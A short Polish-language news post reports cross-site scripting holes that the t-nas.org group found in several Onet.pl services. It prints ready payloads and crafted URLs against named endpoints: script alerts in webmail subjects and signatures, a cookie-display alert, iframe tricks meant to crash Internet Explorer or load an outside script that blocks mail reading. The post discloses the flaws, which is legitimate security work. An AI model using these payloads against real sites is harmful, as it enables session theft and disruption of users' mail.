Błędy w Onet.pl

Niedawno informowaliśmy o błędzie występującym w internetowym serwisie aukcyjnym Allegro.pl pozwalającym na wyświetlenie dowolnego tekstu który pojawi się na każdej stronie serwisu. Grupa t-nas.org odkryła nowe błędy występujące w serwisie Onet.pl. Serwis posiada błędy XSS, które mogą zostać wykorzystane w opisany poniżej sposób.

Luka występująca w kontach pocztowych portalu onet.pl pozwala wprowadzić w temacie kod html lub javascript.

Przykładowo:

Temat: "> - taka wartość powoduje złe tłumaczenie kodu i pozwala wprowadzić np:

Temat: "><script>alert('0xT-NAS'))</script> //Wyswietlenie okienka (screen)

Temat: "><iframe src=C:aux> //spowoduje zawieszenie IE.

Wszystko zostanie wykonane przez użytkownika odbierającego pocztę przez www.

Możliwe jest również odwołanie się do skryptu.

Przykładowo:

Temat: "><iframe src=http://raus.de/crashme> (screen).

Skrypt występujący na tej stronie uniemożliwi odczytanie wiadomości.

Kolejny błąd w systemie poczty portalu Onet.pl pozwala zainicjować dowolny kod umieszczjąc go w podpisie listu.

Przykładowo:

<script>alert(documment.cookies)</script>

Po zapisaniu zmian i próbie napisania nowej wiadomości pojawi się okienko z cookies (screen).

Wszystkie wyżej opisane błędy występowały w systemie kont pocztowych portalu. Niestety nie tylko tutaj znajdują się błędy, kolejne dotyczą serwisu kartki.onet.pl.

Przykładowo:

http://kartki.onet.pl/kartki.html?RE_I=<script>alert('Post_me_card_:P');</script>&RE_E=Takaschi15%40poczta.onet.pl&wyslij.x=123&wyslij.y=0 (screen).

Trochę więcej błędów zostało znalezionych w Info.onet.pl.

Przykładowo:

http://info.onet.pl/4,15,10,"><h1>sp3x<br><h4>in ONET.PL<br><80786,0,0,forum.html (screen).

http://info.onet.pl/9,15,10,,0,forum.html?nc="><script>alert('sp3x');</script>

http://info.onet.pl/8"><h1>RuleZZZZ>6,temat.html (screen).

http://info.onet.pl/forum.html?ptype=wejscie&DB=199&ITEM=14955&BasePage="><script>alert('How are you??');%2F14955%2C0%2C0%2C1%2Cgaleria.html (screen)

Następny błąd dotyczy republika.onet.pl.

Przykładowo:

http://republika.onet.pl/0,1,'1646,1688,artykuly.html?sz=%22%3E%3Ciframe+src%3DC%3Aaux%3E%3C%2Fiframe%3E&klucz=1&wh=F&x=0&y=0